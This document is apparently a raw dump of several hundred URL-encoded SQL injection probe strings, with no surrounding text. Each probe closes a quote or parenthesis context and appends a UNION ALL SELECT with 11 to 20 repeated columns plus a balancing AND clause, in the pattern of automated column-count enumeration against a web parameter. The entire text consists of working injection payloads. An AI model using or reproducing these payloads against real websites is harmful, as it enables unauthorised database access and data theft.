-9347%20UNION%20ALL%20SELECT%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%23 -9168%20UNION%20ALL%20SELECT%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%23 -5161%20UNION%20ALL%20SELECT%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%23 -3557%27%29%20UNION%20ALL%20SELECT%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%23%20AND%20%28%27AIyl%27%3D%27AIyl -9296%27%29%20UNION%20ALL%20SELECT%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%23%20AND%20%28%27tvWB%27%3D%27tvWB -8468%27%29%20UNION%20ALL%20SELECT%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%23%20AND%20%28%27buNU%27%3D%27buNU -7921%27%29%20UNION%20ALL%20SELECT%209341%2C%209341%2C%209341%2C%209341%2C%209341%2C%209341%2C%209341%2C%209341%2C%209341%2C%209341%2C%209341%2C%209341%2C%209341%2C%209341%23%20AND%20%28%27AYRp%27%3D%27AYRp -6087%27%29%20UNION%20ALL%20SELECT%202752%2C%202752%2C%202752%2C%202752%2C%202752%2C%202752%2C%202752%2C%202752%2C%202752%2C%202752%2C%202752%2C%202752%2C%202752%2C%202752%2C%202752%23%20AND%20%28%27FUVr%27%3D%27FUVr -8064%27%29%20UNION%20ALL%20SELECT%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%23%20AND%20%28%27sHFK%27%3D%27sHFK -9409%27%29%20UNION%20ALL%20SELECT%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%23%20AND%20%28%27RBCs%27%3D%27RBCs -3749%27%29%20UNION%20ALL%20SELECT%205327%2C%205327%2C%205327%2C%205327%2C%205327%2C%205327%2C%205327%2C%205327%2C%205327%2C%205327%2C%205327%2C%205327%2C%205327%2C%205327%2C%205327%2C%205327%2C%205327%2C%205327%23%20AND%20%28%27WdFR%27%3D%27WdFR -7008%27%29%20UNION%20ALL%20SELECT%209099%2C%209099%2C%209099%2C%209099%2C%209099%2C%209099%2C%209099%2C%209099%2C%209099%2C%209099%2C%209099%2C%209099%2C%209099%2C%209099%2C%209099%2C%209099%2C%209099%2C%209099%2C%209099%23%20AND%20%28%27YrxD%27%3D%27YrxD -3697%27%29%20UNION%20ALL%20SELECT%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%23%20AND%20%28%27uazC%27%3D%27uazC -3449%27%29%29%20UNION%20ALL%20SELECT%209775%2C%209775%2C%209775%2C%209775%2C%209775%2C%209775%2C%209775%2C%209775%2C%209775%2C%209775%2C%209775%23%20AND%20%28%28%27xaKq%27%3D%27xaKq -2094%27%29%29%20UNION%20ALL%20SELECT%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%23%20AND%20%28%28%27pywA%27%3D%27pywA -1843%27%29%29%20UNION%20ALL%20SELECT%209620%2C%209620%2C%209620%2C%209620%2C%209620%2C%209620%2C%209620%2C%209620%2C%209620%2C%209620%2C%209620%2C%209620%2C%209620%23%20AND%20%28%28%27MmOk%27%3D%27MmOk -2815%27%29%29%20UNION%20ALL%20SELECT%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%23%20AND%20%28%28%27Pfaf%27%3D%27Pfaf -1734%27%29%29%20UNION%20ALL%20SELECT%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%23%20AND%20%28%28%27rqFk%27%3D%27rqFk -3970%27%29%29%20UNION%20ALL%20SELECT%203249%2C%203249%2C%203249%2C%203249%2C%203249%2C%203249%2C%203249%2C%203249%2C%203249%2C%203249%2C%203249%2C%203249%2C%203249%2C%203249%2C%203249%2C%203249%23%20AND%20%28%28%27Xent%27%3D%27Xent -4194%27%29%29%20UNION%20ALL%20SELECT%205187%2C%205187%2C%205187%2C%205187%2C%205187%2C%205187%2C%205187%2C%205187%2C%205187%2C%205187%2C%205187%2C%205187%2C%205187%2C%205187%2C%205187%2C%205187%2C%205187%23%20AND%20%28%28%27xpUA%27%3D%27xpUA -6358%27%29%29%20UNION%20ALL%20SELECT%207209%2C%207209%2C%207209%2C%207209%2C%207209%2C%207209%2C%207209%2C%207209%2C%207209%2C%207209%2C%207209%2C%207209%2C%207209%2C%207209%2C%207209%2C%207209%2C%207209%2C%207209%23%20AND%20%28%28%27ixSg%27%3D%27ixSg -1033%27%29%29%20UNION%20ALL%20SELECT%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%23%20AND%20%28%28%27Imqv%27%3D%27Imqv -9726%27%29%29%20UNION%20ALL%20SELECT%203439%2C%203439%2C%203439%2C%203439%2C%203439%2C%203439%2C%203439%2C%203439%2C%203439%2C%203439%2C%203439%2C%203439%2C%203439%2C%203439%2C%203439%2C%203439%2C%203439%2C%203439%2C%203439%2C%203439%23%20AND%20%28%28%27VWYE%27%3D%27VWYE -1884%27%29%29%29%20UNION%20ALL%20SELECT%205065%2C%205065%2C%205065%2C%205065%2C%205065%2C%205065%2C%205065%2C%205065%2C%205065%2C%205065%2C%205065%23%20AND%20%28%28%28%27UlGY%27%3D%27UlGY -5921%27%29%29%29%20UNION%20ALL%20SELECT%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%2C%205141%23%20AND%20%28%28%28%27Nzzw%27%3D%27Nzzw -4443%27%29%29%29%20UNION%20ALL%20SELECT%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%23%20AND%20%28%28%28%27EkXO%27%3D%27EkXO -3970%27%29%29%29%20UNION%20ALL%20SELECT%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%23%20AND%20%28%28%28%27wjoy%27%3D%27wjoy -8671%27%29%29%29%20UNION%20ALL%20SELECT%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%23%20AND%20%28%28%28%27lYth%27%3D%27lYth -5114%27%29%29%29%20UNION%20ALL%20SELECT%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%23%20AND%20%28%28%28%27NjVx%27%3D%27NjVx -6915%27%29%29%29%20UNION%20ALL%20SELECT%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%23%20AND%20%28%28%28%27TAMG%27%3D%27TAMG -6912%27%29%29%29%20UNION%20ALL%20SELECT%203119%2C%203119%2C%203119%2C%203119%2C%203119%2C%203119%2C%203119%2C%203119%2C%203119%2C%203119%2C%203119%2C%203119%2C%203119%2C%203119%2C%203119%2C%203119%2C%203119%2C%203119%23%20AND%20%28%28%28%27nosx%27%3D%27nosx -2326%27%29%29%29%20UNION%20ALL%20SELECT%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%23%20AND%20%28%28%28%27qrFo%27%3D%27qrFo -9467%27%29%29%29%20UNION%20ALL%20SELECT%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%23%20AND%20%28%28%28%27hZdH%27%3D%27hZdH -3075%27%20UNION%20ALL%20SELECT%207971%2C%207971%2C%207971%2C%207971%2C%207971%2C%207971%2C%207971%2C%207971%2C%207971%2C%207971%2C%207971%23%20AND%20%27Isab%27%3D%27Isab -8782%27%20UNION%20ALL%20SELECT%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%23%20AND%20%27mSio%27%3D%27mSio -3444%27%20UNION%20ALL%20SELECT%202299%2C%202299%2C%202299%2C%202299%2C%202299%2C%202299%2C%202299%2C%202299%2C%202299%2C%202299%2C%202299%2C%202299%2C%202299%23%20AND%20%27osQW%27%3D%27osQW -8434%27%20UNION%20ALL%20SELECT%205511%2C%205511%2C%205511%2C%205511%2C%205511%2C%205511%2C%205511%2C%205511%2C%205511%2C%205511%2C%205511%2C%205511%2C%205511%2C%205511%23%20AND%20%27wBcu%27%3D%27wBcu -1031%27%20UNION%20ALL%20SELECT%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%23%20AND%20%27mdNJ%27%3D%27mdNJ -2037%27%20UNION%20ALL%20SELECT%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%23%20AND%20%27FFnp%27%3D%27FFnp -9585%27%20UNION%20ALL%20SELECT%204255%2C%204255%2C%204255%2C%204255%2C%204255%2C%204255%2C%204255%2C%204255%2C%204255%2C%204255%2C%204255%2C%204255%2C%204255%2C%204255%2C%204255%2C%204255%2C%204255%23%20AND%20%27RwqK%27%3D%27RwqK -6144%27%20UNION%20ALL%20SELECT%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%23%20AND%20%27OHlD%27%3D%27OHlD -2887%27%20UNION%20ALL%20SELECT%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%23%20AND%20%27GfRg%27%3D%27GfRg -1006%27%20UNION%20ALL%20SELECT%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%23%20AND%20%27Uibg%27%3D%27Uibg -2590%27%29%20UNION%20ALL%20SELECT%202346%2C%202346%2C%202346%2C%202346%2C%202346%2C%202346%2C%202346%2C%202346%2C%202346%2C%202346%2C%202346%23%20AND%20%28%27EhrJ%27%20LIKE%20%27EhrJ -1546%27%29%20UNION%20ALL%20SELECT%201509%2C%201509%2C%201509%2C%201509%2C%201509%2C%201509%2C%201509%2C%201509%2C%201509%2C%201509%2C%201509%2C%201509%23%20AND%20%28%27Dibo%27%20LIKE%20%27Dibo -3993%27%29%20UNION%20ALL%20SELECT%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%23%20AND%20%28%27slYf%27%20LIKE%20%27slYf -1528%27%29%20UNION%20ALL%20SELECT%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%23%20AND%20%28%27iZbK%27%20LIKE%20%27iZbK -1158%27%29%20UNION%20ALL%20SELECT%208278%2C%208278%2C%208278%2C%208278%2C%208278%2C%208278%2C%208278%2C%208278%2C%208278%2C%208278%2C%208278%2C%208278%2C%208278%2C%208278%2C%208278%23%20AND%20%28%27piAG%27%20LIKE%20%27piAG -1905%27%29%20UNION%20ALL%20SELECT%206418%2C%206418%2C%206418%2C%206418%2C%206418%2C%206418%2C%206418%2C%206418%2C%206418%2C%206418%2C%206418%2C%206418%2C%206418%2C%206418%2C%206418%2C%206418%23%20AND%20%28%27aKUE%27%20LIKE%20%27aKUE -8821%27%29%20UNION%20ALL%20SELECT%203719%2C%203719%2C%203719%2C%203719%2C%203719%2C%203719%2C%203719%2C%203719%2C%203719%2C%203719%2C%203719%2C%203719%2C%203719%2C%203719%2C%203719%2C%203719%2C%203719%23%20AND%20%28%27nQzV%27%20LIKE%20%27nQzV -6494%27%29%20UNION%20ALL%20SELECT%201735%2C%201735%2C%201735%2C%201735%2C%201735%2C%201735%2C%201735%2C%201735%2C%201735%2C%201735%2C%201735%2C%201735%2C%201735%2C%201735%2C%201735%2C%201735%2C%201735%2C%201735%23%20AND%20%28%27ayBc%27%20LIKE%20%27ayBc -5561%27%29%20UNION%20ALL%20SELECT%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%23%20AND%20%28%27IeVD%27%20LIKE%20%27IeVD -3407%27%29%20UNION%20ALL%20SELECT%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%23%20AND%20%28%27iMrO%27%20LIKE%20%27iMrO -9824%27%29%29%20UNION%20ALL%20SELECT%204677%2C%204677%2C%204677%2C%204677%2C%204677%2C%204677%2C%204677%2C%204677%2C%204677%2C%204677%2C%204677%23%20AND%20%28%28%27wiJd%27%20LIKE%20%27wiJd -1291%27%29%29%20UNION%20ALL%20SELECT%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%23%20AND%20%28%28%27SbDq%27%20LIKE%20%27SbDq -2950%27%29%29%20UNION%20ALL%20SELECT%202156%2C%202156%2C%202156%2C%202156%2C%202156%2C%202156%2C%202156%2C%202156%2C%202156%2C%202156%2C%202156%2C%202156%2C%202156%23%20AND%20%28%28%27OPJS%27%20LIKE%20%27OPJS -9218%27%29%29%20UNION%20ALL%20SELECT%209792%2C%209792%2C%209792%2C%209792%2C%209792%2C%209792%2C%209792%2C%209792%2C%209792%2C%209792%2C%209792%2C%209792%2C%209792%2C%209792%23%20AND%20%28%28%27ANHE%27%20LIKE%20%27ANHE -4711%27%29%29%20UNION%20ALL%20SELECT%202513%2C%202513%2C%202513%2C%202513%2C%202513%2C%202513%2C%202513%2C%202513%2C%202513%2C%202513%2C%202513%2C%202513%2C%202513%2C%202513%2C%202513%23%20AND%20%28%28%27aIvH%27%20LIKE%20%27aIvH -2755%27%29%29%20UNION%20ALL%20SELECT%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%23%20AND%20%28%28%27xVKQ%27%20LIKE%20%27xVKQ -1205%27%29%29%20UNION%20ALL%20SELECT%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%23%20AND%20%28%28%27hUqe%27%20LIKE%20%27hUqe -3722%27%29%29%20UNION%20ALL%20SELECT%208794%2C%208794%2C%208794%2C%208794%2C%208794%2C%208794%2C%208794%2C%208794%2C%208794%2C%208794%2C%208794%2C%208794%2C%208794%2C%208794%2C%208794%2C%208794%2C%208794%2C%208794%23%20AND%20%28%28%27WdZO%27%20LIKE%20%27WdZO -2794%27%29%29%20UNION%20ALL%20SELECT%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%23%20AND%20%28%28%27rEXn%27%20LIKE%20%27rEXn -7767%27%29%29%20UNION%20ALL%20SELECT%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%23%20AND%20%28%28%27xzWT%27%20LIKE%20%27xzWT -3142%27%29%29%29%20UNION%20ALL%20SELECT%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%23%20AND%20%28%28%28%27hIXJ%27%20LIKE%20%27hIXJ -5679%27%29%29%29%20UNION%20ALL%20SELECT%204792%2C%204792%2C%204792%2C%204792%2C%204792%2C%204792%2C%204792%2C%204792%2C%204792%2C%204792%2C%204792%2C%204792%23%20AND%20%28%28%28%27LbTv%27%20LIKE%20%27LbTv -9116%27%29%29%29%20UNION%20ALL%20SELECT%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%23%20AND%20%28%28%28%27hSaM%27%20LIKE%20%27hSaM -3592%27%29%29%29%20UNION%20ALL%20SELECT%204668%2C%204668%2C%204668%2C%204668%2C%204668%2C%204668%2C%204668%2C%204668%2C%204668%2C%204668%2C%204668%2C%204668%2C%204668%2C%204668%23%20AND%20%28%28%28%27CHIH%27%20LIKE%20%27CHIH -4983%27%29%29%29%20UNION%20ALL%20SELECT%207095%2C%207095%2C%207095%2C%207095%2C%207095%2C%207095%2C%207095%2C%207095%2C%207095%2C%207095%2C%207095%2C%207095%2C%207095%2C%207095%2C%207095%23%20AND%20%28%28%28%27HSyX%27%20LIKE%20%27HSyX -1598%27%29%29%29%20UNION%20ALL%20SELECT%208673%2C%208673%2C%208673%2C%208673%2C%208673%2C%208673%2C%208673%2C%208673%2C%208673%2C%208673%2C%208673%2C%208673%2C%208673%2C%208673%2C%208673%2C%208673%23%20AND%20%28%28%28%27iDDd%27%20LIKE%20%27iDDd -5137%27%29%29%29%20UNION%20ALL%20SELECT%204812%2C%204812%2C%204812%2C%204812%2C%204812%2C%204812%2C%204812%2C%204812%2C%204812%2C%204812%2C%204812%2C%204812%2C%204812%2C%204812%2C%204812%2C%204812%2C%204812%23%20AND%20%28%28%28%27JoXB%27%20LIKE%20%27JoXB -5244%27%29%29%29%20UNION%20ALL%20SELECT%204227%2C%204227%2C%204227%2C%204227%2C%204227%2C%204227%2C%204227%2C%204227%2C%204227%2C%204227%2C%204227%2C%204227%2C%204227%2C%204227%2C%204227%2C%204227%2C%204227%2C%204227%23%20AND%20%28%28%28%27uINM%27%20LIKE%20%27uINM -8482%27%29%29%29%20UNION%20ALL%20SELECT%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%23%20AND%20%28%28%28%27Hzzv%27%20LIKE%20%27Hzzv -9243%27%29%29%29%20UNION%20ALL%20SELECT%205878%2C%205878%2C%205878%2C%205878%2C%205878%2C%205878%2C%205878%2C%205878%2C%205878%2C%205878%2C%205878%2C%205878%2C%205878%2C%205878%2C%205878%2C%205878%2C%205878%2C%205878%2C%205878%2C%205878%23%20AND%20%28%28%28%27zpgB%27%20LIKE%20%27zpgB -4765%27%20UNION%20ALL%20SELECT%204979%2C%204979%2C%204979%2C%204979%2C%204979%2C%204979%2C%204979%2C%204979%2C%204979%2C%204979%2C%204979%23%20AND%20%27IDnf%27%20LIKE%20%27IDnf -8403%27%20UNION%20ALL%20SELECT%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%23%20AND%20%27AkRX%27%20LIKE%20%27AkRX -9736%27%20UNION%20ALL%20SELECT%201705%2C%201705%2C%201705%2C%201705%2C%201705%2C%201705%2C%201705%2C%201705%2C%201705%2C%201705%2C%201705%2C%201705%2C%201705%23%20AND%20%27VyAi%27%20LIKE%20%27VyAi -6906%27%20UNION%20ALL%20SELECT%208283%2C%208283%2C%208283%2C%208283%2C%208283%2C%208283%2C%208283%2C%208283%2C%208283%2C%208283%2C%208283%2C%208283%2C%208283%2C%208283%23%20AND%20%27XaID%27%20LIKE%20%27XaID -8819%27%20UNION%20ALL%20SELECT%207315%2C%207315%2C%207315%2C%207315%2C%207315%2C%207315%2C%207315%2C%207315%2C%207315%2C%207315%2C%207315%2C%207315%2C%207315%2C%207315%2C%207315%23%20AND%20%27cnkM%27%20LIKE%20%27cnkM -1088%27%20UNION%20ALL%20SELECT%207398%2C%207398%2C%207398%2C%207398%2C%207398%2C%207398%2C%207398%2C%207398%2C%207398%2C%207398%2C%207398%2C%207398%2C%207398%2C%207398%2C%207398%2C%207398%23%20AND%20%27CdOx%27%20LIKE%20%27CdOx -4326%27%20UNION%20ALL%20SELECT%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%23%20AND%20%27ZuPF%27%20LIKE%20%27ZuPF -4808%27%20UNION%20ALL%20SELECT%208577%2C%208577%2C%208577%2C%208577%2C%208577%2C%208577%2C%208577%2C%208577%2C%208577%2C%208577%2C%208577%2C%208577%2C%208577%2C%208577%2C%208577%2C%208577%2C%208577%2C%208577%23%20AND%20%27ylXw%27%20LIKE%20%27ylXw -3760%27%20UNION%20ALL%20SELECT%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%23%20AND%20%27GmSB%27%20LIKE%20%27GmSB -7014%27%20UNION%20ALL%20SELECT%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%23%20AND%20%27TaiN%27%20LIKE%20%27TaiN -3976%22%29%20UNION%20ALL%20SELECT%202144%2C%202144%2C%202144%2C%202144%2C%202144%2C%202144%2C%202144%2C%202144%2C%202144%2C%202144%2C%202144%23%20AND%20%28%22fPIz%22%3D%22fPIz -1631%22%29%20UNION%20ALL%20SELECT%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%23%20AND%20%28%22MTtV%22%3D%22MTtV -7893%22%29%20UNION%20ALL%20SELECT%202071%2C%202071%2C%202071%2C%202071%2C%202071%2C%202071%2C%202071%2C%202071%2C%202071%2C%202071%2C%202071%2C%202071%2C%202071%23%20AND%20%28%22DzXn%22%3D%22DzXn -8575%22%29%20UNION%20ALL%20SELECT%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%23%20AND%20%28%22cfVo%22%3D%22cfVo -2573%22%29%20UNION%20ALL%20SELECT%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%23%20AND%20%28%22Vgft%22%3D%22Vgft -4388%22%29%20UNION%20ALL%20SELECT%209422%2C%209422%2C%209422%2C%209422%2C%209422%2C%209422%2C%209422%2C%209422%2C%209422%2C%209422%2C%209422%2C%209422%2C%209422%2C%209422%2C%209422%2C%209422%23%20AND%20%28%22dcpp%22%3D%22dcpp -5890%22%29%20UNION%20ALL%20SELECT%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%23%20AND%20%28%22iQkB%22%3D%22iQkB -6585%22%29%20UNION%20ALL%20SELECT%208306%2C%208306%2C%208306%2C%208306%2C%208306%2C%208306%2C%208306%2C%208306%2C%208306%2C%208306%2C%208306%2C%208306%2C%208306%2C%208306%2C%208306%2C%208306%2C%208306%2C%208306%23%20AND%20%28%22pTJS%22%3D%22pTJS -8921%22%29%20UNION%20ALL%20SELECT%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%23%20AND%20%28%22sHPC%22%3D%22sHPC -9260%22%29%20UNION%20ALL%20SELECT%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%23%20AND%20%28%22OQjF%22%3D%22OQjF -6949%22%29%29%20UNION%20ALL%20SELECT%203885%2C%203885%2C%203885%2C%203885%2C%203885%2C%203885%2C%203885%2C%203885%2C%203885%2C%203885%2C%203885%23%20AND%20%28%28%22IcId%22%3D%22IcId -7379%22%29%29%20UNION%20ALL%20SELECT%206352%2C%206352%2C%206352%2C%206352%2C%206352%2C%206352%2C%206352%2C%206352%2C%206352%2C%206352%2C%206352%2C%206352%23%20AND%20%28%28%22RYmq%22%3D%22RYmq -9048%22%29%29%20UNION%20ALL%20SELECT%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%23%20AND%20%28%28%22yiKZ%22%3D%22yiKZ -2991%22%29%29%20UNION%20ALL%20SELECT%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%23%20AND%20%28%28%22iMfK%22%3D%22iMfK -5616%22%29%29%20UNION%20ALL%20SELECT%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%23%20AND%20%28%28%22IGEa%22%3D%22IGEa -1409%22%29%29%20UNION%20ALL%20SELECT%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%23%20AND%20%28%28%22mWBA%22%3D%22mWBA -6087%22%29%29%20UNION%20ALL%20SELECT%201275%2C%201275%2C%201275%2C%201275%2C%201275%2C%201275%2C%201275%2C%201275%2C%201275%2C%201275%2C%201275%2C%201275%2C%201275%2C%201275%2C%201275%2C%201275%2C%201275%23%20AND%20%28%28%22nloB%22%3D%22nloB -6586%22%29%29%20UNION%20ALL%20SELECT%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%23%20AND%20%28%28%22iGLt%22%3D%22iGLt -1747%22%29%29%20UNION%20ALL%20SELECT%206231%2C%206231%2C%206231%2C%206231%2C%206231%2C%206231%2C%206231%2C%206231%2C%206231%2C%206231%2C%206231%2C%206231%2C%206231%2C%206231%2C%206231%2C%206231%2C%206231%2C%206231%2C%206231%23%20AND%20%28%28%22HNLO%22%3D%22HNLO -6973%22%29%29%20UNION%20ALL%20SELECT%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%23%20AND%20%28%28%22GglB%22%3D%22GglB -6925%22%29%29%29%20UNION%20ALL%20SELECT%206963%2C%206963%2C%206963%2C%206963%2C%206963%2C%206963%2C%206963%2C%206963%2C%206963%2C%206963%2C%206963%23%20AND%20%28%28%28%22lpHv%22%3D%22lpHv 